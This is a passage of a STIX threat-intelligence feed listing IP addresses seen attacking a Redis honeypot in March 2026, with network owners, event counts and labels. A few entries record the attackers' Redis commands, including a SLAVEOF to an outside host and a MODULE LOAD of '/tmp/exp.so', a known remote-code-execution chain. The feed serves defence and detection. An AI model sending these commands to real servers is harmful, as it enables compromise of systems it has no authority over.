      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T03:25:14.000Z",
      "valid_until": "2026-04-29T03:25:13.000Z"
    },
    {
      "created": "2026-03-28T04:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--b3097b8a-6794-42c8-9f4a-ac2eb679d791",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T04:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.57']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T04:25:08.000Z",
      "valid_until": "2026-04-29T04:25:05.000Z"
    },
    {
      "created": "2026-03-28T06:25:26.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--13560319-71d0-4b64-9178-a120c2c1f100",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T06:25:26.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.38.45.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T06:25:26.000Z",
      "valid_until": "2026-04-29T06:25:13.000Z"
    },
    {
      "created": "2026-03-28T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmds=SLAVEOF NO ONE,CONFIG SET dbfilename exp.so,MODULE LOAD /tmp/exp.so,config set dir .,config set dbfilename root; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--1768e0ae-95d4-428b-8559-aa31cbe3515c",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-28T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '111.228.28.79']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T07:25:14.000Z",
      "valid_until": "2026-04-29T07:25:12.000Z"
    },
    {
      "created": "2026-03-28T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--87d04782-de54-41a1-a0ee-39c151f1acfd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.108.96.168']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T07:25:14.000Z",
      "valid_until": "2026-04-29T07:25:12.000Z"
    },
    {
      "created": "2026-03-28T07:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0",
      "id": "indicator--84b03f10-f707-4076-9b4f-5b3440814918",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T07:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '86.54.31.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T07:25:14.000Z",
      "valid_until": "2026-04-29T07:25:12.000Z"
    },
    {
      "created": "2026-03-28T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--248622b2-7296-4968-9f01-4fa841dab485",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.138.57.177']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T08:25:13.000Z",
      "valid_until": "2026-04-29T08:25:12.000Z"
    },
    {
      "created": "2026-03-28T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0",
      "id": "indicator--1065b016-75f7-4523-b9b5-bb5051811f9b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.111.32.16']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T11:25:13.000Z",
      "valid_until": "2026-04-29T11:25:12.000Z"
    },
    {
      "created": "2026-03-28T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=40; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=config set dbfilename dump.rdb,SLAVEOF 8.210.50.65 60126,MODULE UNLOAD system,CONFIG SET dir /tmp/,config set rdbcompression no; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--9573a02f-ada9-4aa7-992b-05bc245bf1b4",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-28T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.116.163.71']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T11:25:13.000Z",
      "valid_until": "2026-04-29T11:25:12.000Z"
    },
    {
      "created": "2026-03-28T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--1ed09684-aab3-4a19-bd46-9996c4acd1bb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '23.92.27.179']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T13:25:13.000Z",
      "valid_until": "2026-04-29T13:25:12.000Z"
    },
    {
      "created": "2026-03-28T14:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--3716e489-22ee-4f74-b4d0-368638dd945f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T14:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.223.189.243']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T14:25:05.000Z",
      "valid_until": "2026-04-29T14:25:02.000Z"
    },
    {
      "created": "2026-03-28T14:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--30b43fe2-ee1b-4799-b868-cf7be8d237a6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T14:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T14:25:05.000Z",
      "valid_until": "2026-04-29T14:25:02.000Z"
    },
    {
      "created": "2026-03-28T14:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--15ac724f-2c2b-461f-a824-34fe82096db9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T14:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.110']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T14:25:05.000Z",
      "valid_until": "2026-04-29T14:25:02.000Z"
    },
    {
      "created": "2026-03-28T15:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--8008d310-191d-4ad6-ac1d-9623bd0fa539",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T15:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '160.119.76.57']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T15:25:15.000Z",
      "valid_until": "2026-04-29T15:25:12.000Z"
    },
    {
      "created": "2026-03-28T18:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--257e2967-7cd4-4f9a-930a-27f7b1d72e45",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T18:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.68.224.112']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T18:25:14.000Z",
      "valid_until": "2026-04-29T18:25:13.000Z"
    },
    {
      "created": "2026-03-28T20:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--a6fd9c77-539c-4fe5-838d-4f4d366cd53f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T20:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.45.236.191']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T20:25:14.000Z",
      "valid_until": "2026-04-29T20:25:12.000Z"
    },
    {
      "created": "2026-03-28T20:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--c2760d42-3810-4bdd-b5b6-dbbe8697c7dd",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T20:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '34.193.119.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T20:25:14.000Z",
      "valid_until": "2026-04-29T20:25:12.000Z"
    },
    {
      "created": "2026-03-28T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--73ac424b-5033-4749-be5b-8976477e4f69",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.137.158.226']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T21:25:14.000Z",
      "valid_until": "2026-04-29T21:25:12.000Z"
    },
    {
      "created": "2026-03-28T22:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--43878448-675b-4cfd-83bc-e21f4d8742b6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-28T22:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.237.126.220']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T22:25:14.000Z",
      "valid_until": "2026-04-29T22:25:12.000Z"
    },
    {
      "created": "2026-03-28T22:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=TR; asn=197450; asn_org=Sunucun Bilgi Iletisim Teknolojileri ve Ticaret Ltd. Sti.; redis_cmd_hits=0",
      "id": "indicator--c383b1cd-af6e-406c-8a8f-67eda7b15d56",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T22:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '212.64.201.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-28T22:25:14.000Z",
      "valid_until": "2026-04-29T22:25:12.000Z"
    },
    {
      "created": "2026-03-29T00:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--c6e26dd7-82a4-4b89-b857-ec7963f84934",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T00:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '104.248.117.15']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T00:25:15.000Z",
      "valid_until": "2026-04-30T00:25:13.000Z"
    },
    {
      "created": "2026-03-29T01:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--9525cd3f-a376-4380-988d-afaf37bfeceb",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T01:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.97']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T01:25:15.000Z",
      "valid_until": "2026-04-30T01:25:13.000Z"
    },
    {
      "created": "2026-03-29T01:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0",
      "id": "indicator--ee0946e3-d556-404d-9449-840706cfe1c4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T01:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '78.47.232.216']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T01:25:15.000Z",
      "valid_until": "2026-04-30T01:25:13.000Z"
    },
    {
      "created": "2026-03-29T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--19a2f3e0-7695-422a-83cc-2040e62d1b68",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '124.220.60.188']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T03:25:13.000Z",
      "valid_until": "2026-04-30T03:25:12.000Z"
    },
    {
      "created": "2026-03-29T04:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0",
      "id": "indicator--cdc6e8b3-7870-4a67-8cbd-9b55b6755ba7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T04:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '113.209.196.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T04:25:10.000Z",
      "valid_until": "2026-04-30T04:25:08.000Z"
    },
    {
      "created": "2026-03-29T04:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--829a1586-6feb-4bba-9291-6e37d6ed4e1f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T04:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.25']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T04:25:10.000Z",
      "valid_until": "2026-04-30T04:25:08.000Z"
    },
    {
      "created": "2026-03-29T04:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--23b6403f-6741-46f0-9590-ca362e7e67bc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T04:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.95.147.229']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T04:25:10.000Z",
      "valid_until": "2026-04-30T04:25:08.000Z"
    },
    {
      "created": "2026-03-29T06:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=24; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--34947a51-ae4e-4362-80ab-f1e0f10e6267",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T06:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.89.125.231']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T06:25:14.000Z",
      "valid_until": "2026-04-30T06:25:12.000Z"
    },
    {
      "created": "2026-03-29T07:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--91fde319-83fc-4c82-b9b9-3475f026c800",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T07:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.151.141']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T07:25:07.000Z",
      "valid_until": "2026-04-30T07:25:06.000Z"
    },
    {
      "created": "2026-03-29T07:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=7; ports=6379; cc=TW; asn=3462; asn_org=Data Communication Business Group; redis_cmd_hits=0",
      "id": "indicator--c6f880d1-3e68-413f-9391-7b00e383ab4f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T07:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '211.22.212.137']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T07:25:07.000Z",
      "valid_until": "2026-04-30T07:25:06.000Z"
    },
    {
      "created": "2026-03-29T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--6367351c-f965-45e6-b2fc-095d451ee19b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '117.156.219.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T08:25:13.000Z",
      "valid_until": "2026-04-30T08:25:12.000Z"
    },
    {
      "created": "2026-03-29T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0736f829-40da-45be-a194-c3e1828a4089",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.89.231.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T08:25:13.000Z",
      "valid_until": "2026-04-30T08:25:12.000Z"
    },
    {
      "created": "2026-03-29T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--c169737a-420f-457a-835e-da0c4a42dfec",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.180.141.2']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T08:25:13.000Z",
      "valid_until": "2026-04-30T08:25:12.000Z"
    },
    {
      "created": "2026-03-29T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=PT; asn=21859; asn_org=Zenlayer Inc; redis_cmd_hits=0",
      "id": "indicator--d3985724-15c7-4df4-8e78-06e5e46e325f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.180.141.4']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T08:25:13.000Z",
      "valid_until": "2026-04-30T08:25:12.000Z"
    },
    {
      "created": "2026-03-29T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d09439b0-ae44-436d-b54e-3076961a672e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '206.189.205.166']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T08:25:13.000Z",
      "valid_until": "2026-04-30T08:25:12.000Z"
    },
    {
      "created": "2026-03-29T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--836055fb-a07f-4d63-83fa-3e8d255b3823",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.181']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T10:25:15.000Z",
      "valid_until": "2026-04-30T10:25:06.000Z"
    },
    {
      "created": "2026-03-29T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--bedb1fbf-c710-43b9-9d90-3cf778c3d423",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.218.206.122']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T10:25:15.000Z",
      "valid_until": "2026-04-30T10:25:06.000Z"
    },
    {
      "created": "2026-03-29T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--807ce508-98da-4f29-9dee-aead1c4e0882",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.218.206.66']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T10:25:15.000Z",
      "valid_until": "2026-04-30T10:25:06.000Z"
    },
    {
      "created": "2026-03-29T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=MX; asn=11172; asn_org=Alestra, S. de R.L. de C.V.; redis_cmd_hits=0",
      "id": "indicator--ff914472-d158-4a46-9a62-4958a942d6c2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-29T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '200.188.48.146']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-29T17:25:06.000Z",
      "valid_until": "2026-04-30T17:25:04.000Z"
    },
    {
      "created": "2026-03-29T17:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3a5c4bff-63fa-4134-8d3e-0731f1ba8a1e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-29T17:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.109']",
      "pattern_type": "stix",
